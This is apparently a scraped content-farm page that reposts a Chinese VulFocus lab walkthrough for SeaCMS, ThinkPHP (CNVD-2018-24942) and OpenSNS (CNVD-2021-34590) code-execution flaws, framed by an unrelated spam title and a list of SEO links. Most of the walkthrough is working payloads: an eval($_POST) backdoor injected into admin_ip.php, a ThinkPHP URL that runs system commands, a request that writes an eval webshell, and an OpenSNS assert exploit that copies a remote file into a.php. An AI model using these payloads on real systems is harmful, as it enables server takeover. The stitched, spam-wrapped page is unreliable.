当前位置: 首页 > news >正文

网站开发实训小结哈尔滨互联网广告公司

网站开发实训小结,哈尔滨互联网广告公司,东台建设网站,小程序开发和app开发差别漏洞指北-VulFocus靶场专栏-初级 初级001 #x1f338;海洋CMS代码执行#xff08;CNVD-2020-22721#x1f338;step1#xff1a;进入后台页面 账号密码#xff1a;admin amdinstep2#xff1a;点击系统#xff0c;点击后台IP安全设置,关闭step3 启动burpsuite#xff… 漏洞指北-VulFocus靶场专栏-初级 初级001 海洋CMS代码执行CNVD-2020-22721step1进入后台页面 账号密码admin amdinstep2点击系统点击后台IP安全设置,关闭step3 启动burpsuite启动代理抓请求包step4 http请求包中加入后门等200 的响应状态码step5 200OK 进入admin页面,寻找flag结束 初级002 thinkphp 代码执行 (CNVD-2018-24942)方法1构造payload远程代码执行输入ls /tmp指令方法2: 构造一句话木马result探囊取物 初级003 phpinfo-inclusion 文件写入step1 去指定地址的phpinfo.php文件夹下面step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590step1 构造网页的payload即可方案2 hackbar 初级001 海洋CMS代码执行CNVD-2020-22721 原因 命令执行漏洞在w1aqhp/admin_ip.php下第五行使用set参数对用户输入没有进行任何处理直接写入文件。攻击者可利用该漏洞执行恶意代码获取服务器权限。 后台路径/manager 后台密码admin:admin 解决方案 step1进入后台页面 账号密码admin amdin http://10.11.12.28:17302/manager/login.php step2点击系统点击后台IP安全设置,关闭 拼接指令cmd ls /tmp cmd就是执行shell的命令 常见的flag一般都是在/tmp页面下 注意‘ ’的符号是%20 后面玩捉迷藏有时候会用到这个点。 step3 启动burpsuite启动代理抓请求包 step4 http请求包中加入后门等200 的响应状态码 v0ip11111111111;phpinfo();eval($_POST[cmd]);// step5 200OK 进入admin页面,寻找flag结束 http://10.11.12.28:17302/manager/admin_ip.php 初级002 thinkphp 代码执行 (CNVD-2018-24942) 原因 由于框架对控制器名未能进行足够的检测攻击者利用该漏洞对目标网站进行远程命令执行攻击。 解决方案 方法1构造payload远程代码执行输入ls /tmp指令 http://10.11.12.28:24050/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls%20/tmp 方法2: 构造一句话木马 http://10.11.12.28:24050/?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20eval($_POST[pass])?%3E result探囊取物 初级003 phpinfo-inclusion 文件写入 原因 phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件然后读取从而getshell step1 去指定地址的phpinfo.php文件夹下面 http://10.11.12.28:20756/phpinfo.php step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590 原因 OpenSNS存在命令执行漏洞攻击者可利用该漏洞获取服务器控制权限 step1 构造网页的payload即可 http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdphpinfo() 方案2 hackbar http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdcopy(%27http://xxx/a.txt%27,%27a.php%27)
http://wiki.neutronadmin.com/news/105995/

相关文章:

  • 营销型网站建设营销型手机开发者选项怎么打开
  • 南山网站建设深圳信科怎么注册公司税最低
  • 东莞建站公司运转全网天下有 名wordpress 仿花瓣
  • 学校网站建设工作计划电子商务网站建设的核心多选
  • 营销型网站规划抖音宣传推广
  • 网站套餐到期什么意思海外网站cdn加速下载
  • 怎么做网站结构拓扑图wordpress 文章表
  • 惠州网站建设惠州建设劳务公司注册条件
  • 专业网站设计推荐深圳网络营销推广培训
  • asp网站安装解决方案
  • 网站设计的网站赣州是哪个省
  • app推广多少钱一个宿州网站建设优化
  • 如何建立一个小程序的网站wordpress首页改颜色
  • 网页网站建设软件网站建设高端培训学校
  • 深圳福田园岭网站建设如何建设公司的网站首页
  • 福州网站建设索q4791857002022重大时政热点事件简短
  • 淘宝客网站免费建站建筑工程网络设计
  • 网站建设用图制作音乐排行榜html5
  • 云南微网站建设的公司有哪些咨询公司怎么注册
  • 移动端网站建设的尺寸广西明电建设有限公司网站
  • 流行网站设计做婚庆网站有哪些内容
  • 网站建设贵苏州网络
  • 做网站公司费用wordpress的标题字体大小
  • 如何在网站后台备份数据库表网站建设氺金手指排名15
  • 权威的南昌网站建设是wordpress
  • dede5.7模板 新闻文章网站源码什么网站都有漏洞
  • 沈阳 网站制作报价网页制作自学教程
  • 广西建设厅招投标中心网站如何在百度上发布自己的广告
  • 安徽省住房与城乡建设网站网站制作一年多少钱
  • 广东广州免费建站营销型企业网站有哪些平台